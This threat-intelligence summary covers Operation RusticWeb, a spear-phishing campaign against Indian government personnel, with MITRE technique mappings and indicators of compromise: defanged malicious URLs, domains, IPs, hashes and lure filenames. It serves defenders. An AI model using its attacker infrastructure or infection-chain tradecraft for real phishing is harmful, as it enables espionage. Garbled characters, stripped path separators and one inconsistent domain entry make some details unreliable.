Seqrite researchers document a targeted phishing campaign against Indian government personnel since Oct 2023, deploying Rust-based payloads and encrypted PowerShell to enumerate and exfiltrate documents to a web-based service. The operation shows overlaps with Pakistan-linked APT groups and uses fake government domains and decoy forms to lure victims. #OperationRusticWeb #OshiUpload
Keypoints
- Targeted Indian government and defence sector entities were targeted from Oct 2023 with Rust-based payloads and encrypted PowerShell for data exfiltration.
- Operation RusticWeb overlaps with Pakistan-linked groups such as Transparent Tribe (APT36) and SideCopy, sharing tactics and decoys with prior campaigns.
- Actors shifted from traditional languages to Golang, Rust, and Nim to improve cross-compatibility and evade detection.
- Infection Chain 1 relies on a spear-phishing archive (IPR_2023-24.zip) delivering a malicious shortcut, dropping a PowerShell script via a fake AWES domain.
- PowerShell stage creates decoy documents (e.g., AWES/IAS decoys) and logs activity before downloading and executing subsequent payloads, culminating in a Rust-based final stage.
- Infection Chain 2 uses malicious maldocs with encrypted PowerShell via VBA macros, targeting Parichay (fake AWES domain) and other government decoys, with persistence via Startup and exfiltration to OshiUpload and Firebase-backed services.
MITRE Techniques
- [T1566.002] Phishing β Spear phishing Link β The attacker targets the victim via spear-phishing leading to an archive file named βIPR_2023-24β. βThe attacker targets the victim via spear-phishing leading to an archive file named βIPR_2023-24β.β
- [T1059.001] PowerShell β Command and Scripting Interpreter β PowerShell script begins with setting up URL paths for downloading the subsequent stage payloads β¦ βPowerShell script begins with setting up URL paths for downloading the subsequent stage payloads along with the lure document.β
- [T1105] Ingress Tool Transfer β The attacker downloads and executes payloads from remote domains (e.g., rb[.]gy) to stage the infection.
- [T1547.001] Registry Run Keys / Startup Folder β Persistence via Startup directory for the final payload.
- [T1036.007] Masquerading: Double File Extension β Malicious shortcut masquerading as a PDF with a double extension.
- [T1027.010] Command Obfuscation β Encrypted PowerShell commands and obfuscated IEX/Invoke-Obfuscation techniques observed in maldocs.
- [T1016] System Network Configuration Discovery β The Rust downloader queries external IP via ifconfig.me to log the victimβs IP.
- [T1033] System Owner/User Discovery β Logs include user/domain context during system checks.
- [T1083] File and Directory Discovery β Enumerates documents and archives and lists targeted file types for exfiltration.
- [T1005] Data from Local System β Enumerated documents and archives collected for exfiltration.
- [T1567] Exfiltration β Exfiltration Over Web Service β Logs and files uploaded to public file-sharing services such as OshiUpload.
- [T1041] Exfiltration β Exfiltration Over Unencrypted/Unknown Protocol (via Web Service) β Data uploaded to web services for exfiltration.
Indicators of Compromise
- [Domain] awesscholarship.in, parichay.epar.in β domains used to host payloads and decoys
- [Domain] oshi.at β anonymous file-sharing domain for exfiltrated data
- [IP] 89.117.188.126, 13.232.102.189 β IPs associated with the fake domains
- [URL] hxxps://rb.gy/gbfsi, hxxps://awesscholarship.in/upload/file.zip β URLs used to fetch payloads
- [MD5] 56cb95b63162d0dfceb30100ded1131a, 13ee4bd10f05ee0499e18de68b3ea4d5 β sample executable/file hashes
- [Filename] IPR_2023-24.pdf.zip, IPR_2023-24.pdf.lnk β lure archive and shortcut
- [PDB] syscheck.pdb, alam.pdb β Rust-compiled payloads and their debug info
- [Host] C:ProgramDatasyscheckMySystem.exe, C:ProgramDataMicrologs.txt β dropped payloads/logs in system folders
- [Domain/IP] parichay.in (fake Parichay domain mimicking parichay.nic.in)
- [URL] hxxps://parichay.epar.in/Win/1.pdf, hxxps://parichay.epar.in/Win/Mail_Check.ps1 β malicious document/PS1 deployment